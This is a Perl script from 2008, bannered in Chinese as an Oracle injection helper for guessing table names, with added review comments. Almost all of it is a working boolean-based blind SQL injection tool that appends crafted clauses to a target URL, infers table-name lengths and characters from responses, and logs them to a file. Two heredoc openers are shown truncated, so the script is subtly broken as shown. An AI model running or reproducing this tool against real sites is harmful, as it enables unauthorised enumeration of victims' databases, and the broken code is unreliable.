#!/usr/bin/perl -w
#Codz By N3tl04D
#2008-11-26
use strict;
use LWP;
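# File-scope state shared by the subs below; they close over these lexicals
# rather than receiving them as arguments.
my $browser;              # LWP::UserAgent, created lazily by do_GET()
my $start=time();         # wall-clock start, reported after the table loop
my $p;                    # last character produced by crackasc()
my $word;                 # never assigned at file scope; crack() declares its own
my $pass;                 # unused at file scope; the foreach loops declare their own
# Exactly four positional arguments are required; usage() prints the syntax
# line and exits. Plain call syntax: `&usage` would pass the caller's @_ along.
usage() if @ARGV!=4;
my $inject=$ARGV[0];      # request URL that the probe clause is appended to
my $key_word=$ARGV[1];    # pattern whose presence in a response body counts as "yes"
my $start_table=$ARGV[2]; # first table index to test; the loop runs up to 300
my $save_path=$ARGV[3];   # results file, opened in append mode by save()
info();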
sub do_GET {
    # One shared LWP::UserAgent for the whole run, built on first use.
    $browser ||= LWP::UserAgent->new;
    my $response = $browser->get(@_);
    # List context: body, status line, success flag and the response object.
    if (wantarray) {
        return ($response->content, $response->status_line,
                $response->is_success, $response);
    }
    # Scalar context: the body on success, undef otherwise.
    return $response->content if $response->is_success;
    return;
}
# Length accumulator shared with cracklen(): it builds the guess in here and
# the loop below resets it once a table has been handled.
my $crack;
# Walk table indices from the command-line start up to a hard-coded 300.
# Nothing breaks out of this loop; the timing report further down prints only
# after every index has been tried.
for (my $j=$start_table;$j<=300;$j++) {
print "正在测试第$j个表...\n";
# The second argument is the file-scope $word, which cracklen() never reads.
cracklen($j,$word);
# Reads the shared $crack rather than cracklen()'s return value.
print "得到表长为$crack\n";
crack($j,$crack);
$crack=0;
}
sub cracklen {
# Binary-search the length of the $_[0]-th table name (1-based) with six
# boolean probes, accumulating the guess in the file-scope $crack. Only $_[0]
# is used; the second argument the caller passes is ignored. The caller reads
# $crack afterwards rather than the returned value.
my @dic=(32,16,8,4,2,1);
my $i=0;
# Direction of the next step: +1 after a "yes" answer, -1 after a "no".
my $op=1;
foreach my $pass(@dic)
{
$i++;
$crack+=$op*$pass;
print "大于$crack吗?";
# Boolean-based blind probe: the appended clause compares length(table_name)
# with the current guess and the answer is read from whether $key_word occurs
# in the response body. Consecutive requests differ only in the integer after
# ")>" (and the table index), which is what makes this traffic stand out in
# access logs: a burst of near-identical GETs, up to six per table-name length
# and seven per character (see crackasc()).
my $url="$inject%20and%20(select%20%20length(table_name)%20from%20(select%20rownum%20r,table_name%20from%20(select%20rownum%20r,table_name%20from%20user_tables%20where%20rownum%3C=$_[0]%20order%20by%201%20desc)%20t%20where%20r%3E$_[0]-1%20order%20by%201)t)>".$crack."%20and%20'1'='1";
# Echoes the full probe URL, without a trailing newline.
print $url;
my ($content, $status, $is_success) = do_GET($url);
if (!$is_success) {
# Transport failure: wait 30 s, then abandon the search. $crack keeps its
# partial value and the caller carries on with it.
print "网络有问题。等待30秒 $status\n";
sleep 30;
last;
# NOTE(review): $key_word comes straight from @ARGV and is interpolated as a
# pattern, not a literal, so regex metacharacters in it change what matches.
} elsif ($content =~ m/$key_word/)
{
$op=1;
print " Y\n";
# A "yes" on the final 1-step means the length is still greater than the
# guess, so the answer is one more than the last guess.
if($i==@dic)
{
$crack++;
}
}
else
{
print " N\n";
$op=-1;
}
}
return $crack;
}
# Total wall-clock time, printed once the table loop above has finished.
my $finish = time();
my $elapsed = $finish - $start;
print "用时" . $elapsed . "秒\n";
sub crack {
    # Recover the name of table $_[0] one character at a time, $_[1]
    # characters long, then append the result to the results file.
    my ($table_no, $name_len) = @_;
    my $name;   # stays undef until the first character is appended
    for my $pos (1 .. $name_len) {
        print "正在测试第${pos}位字母...\n";
        my $ch = crackasc($pos, $table_no);
        print "得到第${pos}位为${ch}\n";
        $name .= $ch;
    }
    print $name . "\n";
    save($table_no, $name, $name_len);
}
sub crackasc {
# Binary-search the ASCII code of character $_[0] (1-based) of the $_[1]-th
# table name with seven boolean probes and return it as a one-character
# string. The result is also stored in the file-scope $p.
my @dic=(64,32,16,8,4,2,1);
my $i=0;
# Direction of the next step: +1 after a "yes" answer, -1 after a "no".
my $op=1;
# Starts undefined; the first += treats it as 0.
my $crack1;
foreach my $pass(@dic)
{
$i++;
$crack1+=$op*$pass;
print "大于$crack1吗?";
# Same boolean-based blind probe shape as cracklen(), with
# ascii(substr(table_name, pos, 1)) in place of length(table_name). Up to
# seven requests per character; between them only the integer after ")>"
# and the substr offset change, which is the pattern to look for in logs.
my $url="$inject%20and%20(select%20ascii(substr(table_name,".$_[0].",1))%20from%20(select%20rownum%20r,table_name%20from%20(select%20rownum%20r,table_name%20from%20user_tables%20where%20rownum%3C=".$_[1]."%20order%20by%201%20desc)%20t%20where%20r%3E".$_[1]."-1%20order%20by%201)t)>".$crack1."%20and%20'1'='1";
my ($content, $status, $is_success) = do_GET($url);
if (!$is_success) {
# Transport failure: wait 30 s, give up on this character and return the
# number 1, which the caller appends to the name as the character "1".
print "网络有问题。等待30秒 $status\n";
sleep 30;
$p=1;
return $p;
# NOTE(review): $key_word is an unescaped pattern taken from @ARGV, as in
# cracklen().
} elsif ($content =~ m/$key_word/)
{
$op=1;
print " Y\n";
# "Yes" on the final 1-step: the code is one more than the last guess. The
# increment after chr() does not affect the returned value.
if($i==@dic)
{
$crack1+=1;
$p=chr($crack1);
$crack1++;
return $p;
}
}
else
{
print " N\n";
$op=-1;
# "No" on the final step (7 is the size of @dic): the guess itself is the
# code. The seventh iteration always returns here or in one of the branches
# above, so the loop never runs to completion.
if($i==7)
{
$p=chr($crack1);
$crack1++;
return $p;
}
}
}
}
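sub save {
    # Append one result line (table index, name length, recovered name) to
    # $save_path. Arguments, in order: table index, recovered name, name length.
    my ($table_no, $name, $len) = @_;
    # Three-argument open with a lexical handle: the mode is fixed to append,
    # so a $save_path beginning with '>' or '|' cannot change how it is opened.
    open my $out, '>>', $save_path or die ("Could not open file");
    # No :encoding layer on purpose: the file has no `use utf8`, so the literal
    # is already the raw bytes that were written before.
    print {$out} "\n第${table_no}个表长${len}名${name}";
    # Buffered write errors only surface at close, so check it as well.
    close $out or die ("Could not close file: $!");
}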
sub usage {
# Print the banner and the syntax line, then exit 0.
# NOTE(review): the heredoc opener reads `print <` in this copy and the body
# ends at a USAGE terminator; the opener looks truncated, confirm against the
# original source.
print <
ORACLE注入辅助――猜表名
Codz By N3tl04D 2008-11-26
Syntax: $0 inject_point key_word start_table save_path
USAGE
exit 0
}
sub info {
# Print the same banner as usage() but keep running (the exit is commented
# out below).
# NOTE(review): the heredoc opener reads `print <` in this copy and the body
# ends at an INFO terminator; the opener looks truncated, confirm against the
# original source.
print <
ORACLE注入辅助――猜表名
Codz By N3tl04D 2008-11-26
Syntax: $0 inject_point key_word start_table save_path
INFO
# exit 0
}